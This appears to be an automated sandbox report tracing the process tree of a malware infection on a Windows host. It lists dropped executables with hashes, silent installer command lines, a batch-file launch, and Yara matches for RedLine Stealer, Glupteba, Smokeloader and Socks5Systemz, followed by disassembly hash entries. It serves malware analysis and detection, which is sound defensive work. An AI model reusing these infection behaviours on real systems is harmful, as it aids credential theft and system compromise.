                                                                                                                                                                                                                                Has exited:false

                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                Target ID:20
                                                                                                                                                                                                                                Start time:11:27:39
                                                                                                                                                                                                                                Start date:12/03/2024
                                                                                                                                                                                                                                Path:C:\Users\user\AppData\Local\Temp\BroomSetup.exe
                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                Commandline:C:\Users\user\AppData\Local\Temp\BroomSetup.exe
                                                                                                                                                                                                                                Imagebase:0x400000
                                                                                                                                                                                                                                File size:1'828'864 bytes
                                                                                                                                                                                                                                MD5 hash:EEE5DDCFFBED16222CAC0A1B4E2E466E
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:Borland Delphi
                                                                                                                                                                                                                                Yara matches:
                                                                                                                                                                                                                                • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000014.00000002.3151972256.0000000000401000.00000040.00000001.01000000.00000016.sdmp, Author: Joe Security
                                                                                                                                                                                                                                Reputation:moderate
                                                                                                                                                                                                                                Has exited:false

                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                Target ID:21
                                                                                                                                                                                                                                Start time:11:27:40
                                                                                                                                                                                                                                Start date:12/03/2024
                                                                                                                                                                                                                                Path:C:\Users\user\AppData\Local\Web Link Analyzer\weblinkanalyzer.exe
                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                Commandline:"C:\Users\user\AppData\Local\Web Link Analyzer\weblinkanalyzer.exe" -s
                                                                                                                                                                                                                                Imagebase:0x400000
                                                                                                                                                                                                                                File size:2'075'202 bytes
                                                                                                                                                                                                                                MD5 hash:B0E9D3290621648878CA0D486C60F951
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Yara matches:
                                                                                                                                                                                                                                • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000015.00000000.2055445939.0000000000401000.00000020.00000001.01000000.00000011.sdmp, Author: Joe Security
                                                                                                                                                                                                                                • Rule: JoeSecurity_Socks5Systemz, Description: Yara detected Socks5Systemz, Source: 00000015.00000002.3188674818.0000000002A7B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                • Rule: JoeSecurity_Socks5Systemz, Description: Yara detected Socks5Systemz, Source: 00000015.00000002.3188878338.0000000002B21000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                Has exited:false

                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                Target ID:22
                                                                                                                                                                                                                                Start time:11:27:43
                                                                                                                                                                                                                                Start date:12/03/2024
                                                                                                                                                                                                                                Path:C:\Users\user\AppData\Local\Temp\is-H9RBT.tmp\DAOYzG6VUKOTbMmRBP4iG9FF.tmp
                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                Commandline:"C:\Users\user\AppData\Local\Temp\is-H9RBT.tmp\DAOYzG6VUKOTbMmRBP4iG9FF.tmp" /SL5="$504EC,1807550,56832,C:\Users\user\Pictures\DAOYzG6VUKOTbMmRBP4iG9FF.exe"
                                                                                                                                                                                                                                Imagebase:0x400000
                                                                                                                                                                                                                                File size:706'560 bytes
                                                                                                                                                                                                                                MD5 hash:1C1FD0B05187F81F28F910EB5B511E12
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Has exited:false

                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                Target ID:23
                                                                                                                                                                                                                                Start time:11:27:43
                                                                                                                                                                                                                                Start date:12/03/2024
                                                                                                                                                                                                                                Path:C:\Users\user\Pictures\trvViErxBCFce9vUUZnny6xg.exe
                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                Commandline:"C:\Users\user\Pictures\trvViErxBCFce9vUUZnny6xg.exe"
                                                                                                                                                                                                                                Imagebase:0x400000
                                                                                                                                                                                                                                File size:2'146'073 bytes
                                                                                                                                                                                                                                MD5 hash:4D3AD654117203E9216F6F44480BB6E0
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Has exited:false

                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                Target ID:24
                                                                                                                                                                                                                                Start time:11:27:43
                                                                                                                                                                                                                                Start date:12/03/2024
                                                                                                                                                                                                                                Path:C:\Users\user\Pictures\MX6OxFuxXLJNkbD9F2dPLyyC.exe
                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                Commandline:"C:\Users\user\Pictures\MX6OxFuxXLJNkbD9F2dPLyyC.exe" --silent --allusers=0
                                                                                                                                                                                                                                Imagebase:0x7f0000
                                                                                                                                                                                                                                File size:2'960'760 bytes
                                                                                                                                                                                                                                MD5 hash:61ACBBC8CAEF6EB5C8D4CBDE2EEC2312
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Has exited:false

                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                Target ID:25
                                                                                                                                                                                                                                Start time:11:27:43
                                                                                                                                                                                                                                Start date:12/03/2024
                                                                                                                                                                                                                                Path:C:\Users\user\Pictures\363PwSZXj46RramHioCvzZ7q.exe
                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                Commandline:"C:\Users\user\Pictures\363PwSZXj46RramHioCvzZ7q.exe"
                                                                                                                                                                                                                                Imagebase:0x400000
                                                                                                                                                                                                                                File size:2'146'073 bytes
                                                                                                                                                                                                                                MD5 hash:4D3AD654117203E9216F6F44480BB6E0
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Has exited:false

                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                Target ID:26
                                                                                                                                                                                                                                Start time:11:27:45
                                                                                                                                                                                                                                Start date:12/03/2024
                                                                                                                                                                                                                                Path:C:\Users\user\Pictures\MX6OxFuxXLJNkbD9F2dPLyyC.exe
                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                Commandline:C:\Users\user\Pictures\MX6OxFuxXLJNkbD9F2dPLyyC.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\user\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\user\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=108.0.5067.24 --initial-client-data=0x2f4,0x2f8,0x2fc,0x2d0,0x300,0x6bfa21c8,0x6bfa21d4,0x6bfa21e0
                                                                                                                                                                                                                                Imagebase:0x7f0000
                                                                                                                                                                                                                                File size:2'960'760 bytes
                                                                                                                                                                                                                                MD5 hash:61ACBBC8CAEF6EB5C8D4CBDE2EEC2312
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Has exited:false

                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                Target ID:27
                                                                                                                                                                                                                                Start time:11:27:45
                                                                                                                                                                                                                                Start date:12/03/2024
                                                                                                                                                                                                                                Path:C:\Users\user\Pictures\aKsTqJOcX9LAZThGesUnxmZk.exe
                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                Commandline:"C:\Users\user\Pictures\aKsTqJOcX9LAZThGesUnxmZk.exe"
                                                                                                                                                                                                                                Imagebase:0x400000
                                                                                                                                                                                                                                File size:2'146'073 bytes
                                                                                                                                                                                                                                MD5 hash:4D3AD654117203E9216F6F44480BB6E0
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Has exited:false

                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                Target ID:28
                                                                                                                                                                                                                                Start time:11:27:46
                                                                                                                                                                                                                                Start date:12/03/2024
                                                                                                                                                                                                                                Path:C:\Users\user\Pictures\51fuIpAxuIxVSFNlFyLCdDUf.exe
                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                Commandline:"C:\Users\user\Pictures\51fuIpAxuIxVSFNlFyLCdDUf.exe" --silent --allusers=0
                                                                                                                                                                                                                                Imagebase:0xd70000
                                                                                                                                                                                                                                File size:2'960'760 bytes
                                                                                                                                                                                                                                MD5 hash:B4CEF398C7001044330BE058549F9DE3
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                Target ID:29
                                                                                                                                                                                                                                Start time:11:27:46
                                                                                                                                                                                                                                Start date:12/03/2024
                                                                                                                                                                                                                                Path:C:\Users\user\Pictures\jBpaTqUJP0LUZLvKSUzQoPLO.exe
                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                Commandline:"C:\Users\user\Pictures\jBpaTqUJP0LUZLvKSUzQoPLO.exe"
                                                                                                                                                                                                                                Imagebase:0x400000
                                                                                                                                                                                                                                File size:2'146'073 bytes
                                                                                                                                                                                                                                MD5 hash:4D3AD654117203E9216F6F44480BB6E0
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Has exited:false

                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                Target ID:30
                                                                                                                                                                                                                                Start time:11:27:47
                                                                                                                                                                                                                                Start date:12/03/2024
                                                                                                                                                                                                                                Path:C:\Users\user\Pictures\FnzHBAPEbvEEx8ZWWEvo0R6a.exe
                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                Commandline:"C:\Users\user\Pictures\FnzHBAPEbvEEx8ZWWEvo0R6a.exe"
                                                                                                                                                                                                                                Imagebase:0x400000
                                                                                                                                                                                                                                File size:2'172'545 bytes
                                                                                                                                                                                                                                MD5 hash:9D959BCB3482D418504AF43B76F7A181
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                Target ID:31
                                                                                                                                                                                                                                Start time:11:27:47
                                                                                                                                                                                                                                Start date:12/03/2024
                                                                                                                                                                                                                                Path:C:\Users\user\Pictures\YeDvL2xULnFqNNxNLIvjO2b6.exe
                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                Commandline:"C:\Users\user\Pictures\YeDvL2xULnFqNNxNLIvjO2b6.exe"
                                                                                                                                                                                                                                Imagebase:0x400000
                                                                                                                                                                                                                                File size:2'146'073 bytes
                                                                                                                                                                                                                                MD5 hash:4D3AD654117203E9216F6F44480BB6E0
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Has exited:false

                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                Target ID:32
                                                                                                                                                                                                                                Start time:11:27:49
                                                                                                                                                                                                                                Start date:12/03/2024
                                                                                                                                                                                                                                Path:C:\Users\user\Pictures\51fuIpAxuIxVSFNlFyLCdDUf.exe
                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                Commandline:C:\Users\user\Pictures\51fuIpAxuIxVSFNlFyLCdDUf.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\user\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\user\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=108.0.5067.24 --initial-client-data=0x2f8,0x2fc,0x300,0x2f4,0x304,0x6b3921c8,0x6b3921d4,0x6b3921e0
                                                                                                                                                                                                                                Imagebase:0xd70000
                                                                                                                                                                                                                                File size:2'960'760 bytes
                                                                                                                                                                                                                                MD5 hash:B4CEF398C7001044330BE058549F9DE3
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                Target ID:33
                                                                                                                                                                                                                                Start time:11:27:49
                                                                                                                                                                                                                                Start date:12/03/2024
                                                                                                                                                                                                                                Path:C:\Users\user\AppData\Local\Temp\.opera\Opera Installer Temp\MX6OxFuxXLJNkbD9F2dPLyyC.exe
                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                Commandline:"C:\Users\user\AppData\Local\Temp\.opera\Opera Installer Temp\MX6OxFuxXLJNkbD9F2dPLyyC.exe" --version
                                                                                                                                                                                                                                Imagebase:0x280000
                                                                                                                                                                                                                                File size:2'960'760 bytes
                                                                                                                                                                                                                                MD5 hash:61ACBBC8CAEF6EB5C8D4CBDE2EEC2312
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                Target ID:34
                                                                                                                                                                                                                                Start time:11:27:49
                                                                                                                                                                                                                                Start date:12/03/2024
                                                                                                                                                                                                                                Path:C:\Users\user\Pictures\mlSjlt4YcfcpuVp4aQsoCouK.exe
                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                Commandline:"C:\Users\user\Pictures\mlSjlt4YcfcpuVp4aQsoCouK.exe"
                                                                                                                                                                                                                                Imagebase:0x400000
                                                                                                                                                                                                                                File size:2'172'545 bytes
                                                                                                                                                                                                                                MD5 hash:9D959BCB3482D418504AF43B76F7A181
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                Target ID:35
                                                                                                                                                                                                                                Start time:11:27:49
                                                                                                                                                                                                                                Start date:12/03/2024
                                                                                                                                                                                                                                Path:C:\Users\user\Pictures\f68SQOWBvY0lqnWRcqakARDI.exe
                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                Commandline:"C:\Users\user\Pictures\f68SQOWBvY0lqnWRcqakARDI.exe"
                                                                                                                                                                                                                                Imagebase:0x400000
                                                                                                                                                                                                                                File size:4'283'784 bytes
                                                                                                                                                                                                                                MD5 hash:F0A6999F1BC47C6C468CF6DB95003AD5
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Yara matches:
                                                                                                                                                                                                                                • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000023.00000002.3204206599.0000000001099000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                                • Rule: JoeSecurity_Glupteba, Description: Yara detected Glupteba, Source: 00000023.00000002.3151609844.0000000000843000.00000040.00000001.01000000.00000026.sdmp, Author: Joe Security
                                                                                                                                                                                                                                • Rule: JoeSecurity_Glupteba, Description: Yara detected Glupteba, Source: 00000023.00000002.3216579731.0000000003283000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000023.00000002.3216579731.0000000002E40000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                                Has exited:false

                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                Target ID:36
                                                                                                                                                                                                                                Start time:11:27:49
                                                                                                                                                                                                                                Start date:12/03/2024
                                                                                                                                                                                                                                Path:C:\Users\user\Pictures\8aNg0kr81H7icHssfXxzSpJA.exe
                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                Commandline:"C:\Users\user\Pictures\8aNg0kr81H7icHssfXxzSpJA.exe" --silent --allusers=0
                                                                                                                                                                                                                                Imagebase:0x180000
                                                                                                                                                                                                                                File size:2'960'760 bytes
                                                                                                                                                                                                                                MD5 hash:95F97B76DCB43201CEBCFACE99D5C36C
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Has exited:false

                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                Target ID:37
                                                                                                                                                                                                                                Start time:11:27:49
                                                                                                                                                                                                                                Start date:12/03/2024
                                                                                                                                                                                                                                Path:C:\Users\user\Pictures\IelNhfi6M4d6yMRgQg9Svn6Z.exe
                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                Commandline:"C:\Users\user\Pictures\IelNhfi6M4d6yMRgQg9Svn6Z.exe"
                                                                                                                                                                                                                                Imagebase:0x400000
                                                                                                                                                                                                                                File size:2'146'073 bytes
                                                                                                                                                                                                                                MD5 hash:4D3AD654117203E9216F6F44480BB6E0
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Has exited:false

                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                Target ID:38
                                                                                                                                                                                                                                Start time:11:27:49
                                                                                                                                                                                                                                Start date:12/03/2024
                                                                                                                                                                                                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Temp\Task.bat" "
                                                                                                                                                                                                                                Imagebase:0x240000
                                                                                                                                                                                                                                File size:236'544 bytes
                                                                                                                                                                                                                                MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                Target ID:39
                                                                                                                                                                                                                                Start time:11:27:49
                                                                                                                                                                                                                                Start date:12/03/2024
                                                                                                                                                                                                                                Path:C:\Users\user\Pictures\uOoBNdE6Sm5DmPd13osCbhQm.exe
                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                Commandline:"C:\Users\user\Pictures\uOoBNdE6Sm5DmPd13osCbhQm.exe"
                                                                                                                                                                                                                                Imagebase:0x400000
                                                                                                                                                                                                                                File size:2'172'545 bytes
                                                                                                                                                                                                                                MD5 hash:9D959BCB3482D418504AF43B76F7A181
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Has exited:false

                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                Target ID:40
                                                                                                                                                                                                                                Start time:11:27:49
                                                                                                                                                                                                                                Start date:12/03/2024
                                                                                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                File size:862'208 bytes
                                                                                                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                Target ID:41
                                                                                                                                                                                                                                Start time:11:27:51
                                                                                                                                                                                                                                Start date:12/03/2024
                                                                                                                                                                                                                                Path:C:\Users\user\AppData\Local\Temp\is-0QBP9.tmp\FnzHBAPEbvEEx8ZWWEvo0R6a.tmp
                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                Commandline:"C:\Users\user\AppData\Local\Temp\is-0QBP9.tmp\FnzHBAPEbvEEx8ZWWEvo0R6a.tmp" /SL5="$30596,1807550,56832,C:\Users\user\Pictures\FnzHBAPEbvEEx8ZWWEvo0R6a.exe"
                                                                                                                                                                                                                                Imagebase:0x400000
                                                                                                                                                                                                                                File size:706'560 bytes
                                                                                                                                                                                                                                MD5 hash:1C1FD0B05187F81F28F910EB5B511E12
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                Target ID:42
                                                                                                                                                                                                                                Start time:11:27:51
                                                                                                                                                                                                                                Start date:12/03/2024
                                                                                                                                                                                                                                Path:C:\Users\user\Pictures\23jzBT2gZ2W4aFsNb8WtTEfu.exe
                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                Commandline:"C:\Users\user\Pictures\23jzBT2gZ2W4aFsNb8WtTEfu.exe"
                                                                                                                                                                                                                                Imagebase:0x400000
                                                                                                                                                                                                                                File size:4'283'784 bytes
                                                                                                                                                                                                                                MD5 hash:F0A6999F1BC47C6C468CF6DB95003AD5
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Yara matches:
                                                                                                                                                                                                                                • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 0000002A.00000002.3216850943.0000000002E70000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                                • Rule: JoeSecurity_Glupteba, Description: Yara detected Glupteba, Source: 0000002A.00000002.3151976507.0000000000843000.00000040.00000001.01000000.0000002F.sdmp, Author: Joe Security
                                                                                                                                                                                                                                • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 0000002A.00000002.3211879982.00000000012C8000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                                • Rule: JoeSecurity_Glupteba, Description: Yara detected Glupteba, Source: 0000002A.00000002.3216850943.00000000032B3000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                • Rule: JoeSecurity_Glupteba, Description: Yara detected Glupteba, Source: 0000002A.00000003.2605227269.0000000003BA2000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                Has exited:false

                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                Target ID:43
                                                                                                                                                                                                                                Start time:11:27:51
                                                                                                                                                                                                                                Start date:12/03/2024
                                                                                                                                                                                                                                Path:C:\Users\user\Pictures\1EkTthwf6man8aNjDkP3iYby.exe
                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                Commandline:"C:\Users\user\Pictures\1EkTthwf6man8aNjDkP3iYby.exe" --silent --allusers=0
                                                                                                                                                                                                                                Imagebase:0xab0000
                                                                                                                                                                                                                                File size:2'960'760 bytes
                                                                                                                                                                                                                                MD5 hash:AAFB0357588673B1DB5973DFF4616B8F
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                Target ID:44
                                                                                                                                                                                                                                Start time:11:27:51
                                                                                                                                                                                                                                Start date:12/03/2024
                                                                                                                                                                                                                                Path:C:\Users\user\Pictures\8aNg0kr81H7icHssfXxzSpJA.exe
                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                Commandline:C:\Users\user\Pictures\8aNg0kr81H7icHssfXxzSpJA.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\user\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\user\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=108.0.5067.24 --initial-client-data=0x2f4,0x2f8,0x2fc,0x2bc,0x300,0x6aa121c8,0x6aa121d4,0x6aa121e0
                                                                                                                                                                                                                                Imagebase:0x180000
                                                                                                                                                                                                                                File size:2'960'760 bytes
                                                                                                                                                                                                                                MD5 hash:95F97B76DCB43201CEBCFACE99D5C36C
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Has exited:false

                                                                                                                                                                                                                                Disassembly

                                                                                                                                                                                                                                Reset < >

                                                                                                                                                                                                                                  Executed Functions

                                                                                                                                                                                                                                  Function 0181266D Relevance: .5, Instructions: 483COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000008.00000002.3201208756.0000000001810000.00000040.00000800.00020000.00000000.sdmp, Offset: 01810000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_1810000_InstallUtil.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: b0a8eaceef23fb313900b437ec61e433b7fef32d67ba50d3646dd40984baa1cf
                                                                                                                                                                                                                                  • Instruction ID: 64f42955cc4a254ffc49692a057c443a88074d36edaaef40bf9563ed311c7294
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b0a8eaceef23fb313900b437ec61e433b7fef32d67ba50d3646dd40984baa1cf
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 65E06D327081556FC75556ADAC11B2B6BAECBC9A20F0D00BAE60DD7781C95A5C0B43E3
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 01810E58 Relevance: .1, Instructions: 117COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000008.00000002.3201208756.0000000001810000.00000040.00000800.00020000.00000000.sdmp, Offset: 01810000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_1810000_InstallUtil.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: 5643306feb1e4bd8ffe86afae31267447a7e10459a6af89fbf2f9d118dc0c89f
                                                                                                                                                                                                                                  • Instruction ID: 10d3ddadf5f6a4c997c20176983f0ae8338ee78e2e2140caf67cda9fdb69580f
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5643306feb1e4bd8ffe86afae31267447a7e10459a6af89fbf2f9d118dc0c89f
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E1417231B002058FCB14DB68D944AAEBBF6FF88314F148559E409EB399CB35ED86CB91
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 01810E68 Relevance: .1, Instructions: 112COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000008.00000002.3201208756.0000000001810000.00000040.00000800.00020000.00000000.sdmp, Offset: 01810000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_1810000_InstallUtil.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: cadd5f1db3279262fc0d48c274792b47698bf3680c7ff2b68f346bfbffe4aa5e
